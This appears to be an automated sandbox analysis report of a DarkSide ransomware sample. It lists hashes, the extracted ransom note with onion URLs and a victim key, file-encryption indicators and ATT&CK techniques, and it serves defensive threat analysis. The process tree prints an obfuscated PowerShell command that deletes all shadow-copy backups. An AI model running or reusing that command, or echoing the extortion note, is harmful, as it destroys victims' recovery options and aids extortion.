darkside | 5205f30e5b0ff274c4bab8c647120b0226a898e449b3b114cfeecf4c9c12340e

General

Target

ut.bin.exe
Size

226KB
MD5

c81dae5c67fb72a2c2f24b178aea50b7
SHA1

4bd6437cd1dc77097a7951466531674f80c866c6
SHA256

48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a
SHA512

30d63e080f37f34fb29fd46f8fb1572d79f645154a002c8da5914ae3d51e224bc60601f91f5d58ac2ce9f81d56a8ad467d7fde55d429ed269df3c196e6687b2c

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.df06d794.TXT

Family

darkside

Ransom Note

----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 18 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\InvokeSubmit.crw.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\UpdateGrant.tiff.df06d794	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\ClearRead.raw => C:\Users\Admin\Pictures\ClearRead.raw.df06d794	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\InvokeSubmit.crw => C:\Users\Admin\Pictures\InvokeSubmit.crw.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ResolveDisable.raw.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CloseUnprotect.tiff.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\HideTest.png.df06d794	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\PublishEdit.raw => C:\Users\Admin\Pictures\PublishEdit.raw.df06d794	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\WatchPublish.crw => C:\Users\Admin\Pictures\WatchPublish.crw.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ClearRead.raw.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CloseUnprotect.tiff	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\CloseUnprotect.tiff => C:\Users\Admin\Pictures\CloseUnprotect.tiff.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\UpdateGrant.tiff	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\UpdateGrant.tiff => C:\Users\Admin\Pictures\UpdateGrant.tiff.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\WatchPublish.crw.df06d794	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\HideTest.png => C:\Users\Admin\Pictures\HideTest.png.df06d794	ut.bin.exe
File opened for modification	C:\Users\Admin\Pictures\PublishEdit.raw.df06d794	ut.bin.exe
File renamed	C:\Users\Admin\Pictures\ResolveDisable.raw => C:\Users\Admin\Pictures\ResolveDisable.raw.df06d794	ut.bin.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4448	ut.bin.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4448	ut.bin.exe
4448	ut.bin.exe
4448	ut.bin.exe
4448	ut.bin.exe
4840	powershell.exe
4840	powershell.exe
4840	powershell.exe
4448	ut.bin.exe
4448	ut.bin.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4448	ut.bin.exe
Token: SeSecurityPrivilege	4448	ut.bin.exe
Token: SeTakeOwnershipPrivilege	4448	ut.bin.exe
Token: SeLoadDriverPrivilege	4448	ut.bin.exe
Token: SeSystemProfilePrivilege	4448	ut.bin.exe
Token: SeSystemtimePrivilege	4448	ut.bin.exe
Token: SeProfSingleProcessPrivilege	4448	ut.bin.exe
Token: SeIncBasePriorityPrivilege	4448	ut.bin.exe
Token: SeCreatePagefilePrivilege	4448	ut.bin.exe
Token: SeBackupPrivilege	4448	ut.bin.exe
Token: SeRestorePrivilege	4448	ut.bin.exe
Token: SeShutdownPrivilege	4448	ut.bin.exe
Token: SeDebugPrivilege	4448	ut.bin.exe
Token: SeSystemEnvironmentPrivilege	4448	ut.bin.exe
Token: SeRemoteShutdownPrivilege	4448	ut.bin.exe
Token: SeUndockPrivilege	4448	ut.bin.exe
Token: SeManageVolumePrivilege	4448	ut.bin.exe
Token: 33	4448	ut.bin.exe
Token: 34	4448	ut.bin.exe
Token: 35	4448	ut.bin.exe
Token: 36	4448	ut.bin.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeBackupPrivilege	3792	vssvc.exe
Token: SeRestorePrivilege	3792	vssvc.exe
Token: SeAuditPrivilege	3792	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4448 wrote to memory of 4840	4448	ut.bin.exe	74
PID 4448 wrote to memory of 4840	4448	ut.bin.exe	74

C:\Users\Admin\AppData\Local\Temp\ut.bin.exe
"C:\Users\Admin\AppData\Local\Temp\ut.bin.exe"
1⤵
- Modifies extensions of user files
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4840

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3792

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4448-114-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/4448-116-0x0000000002070000-0x00000000020AC000-memory.dmp

Filesize
240KB

Download
memory/4448-117-0x00000000004B0000-0x00000000005FA000-memory.dmp

Filesize
1.3MB

Download
memory/4840-123-0x0000029CEF910000-0x0000029CEF911000-memory.dmp

Filesize
4KB

Download
memory/4840-128-0x0000029CEFAC0000-0x0000029CEFAC1000-memory.dmp

Filesize
4KB

Download
memory/4840-137-0x0000029CED900000-0x0000029CED902000-memory.dmp

Filesize
8KB

Download
memory/4840-138-0x0000029CED903000-0x0000029CED905000-memory.dmp

Filesize
8KB

Download
memory/4840-139-0x0000029CED906000-0x0000029CED908000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing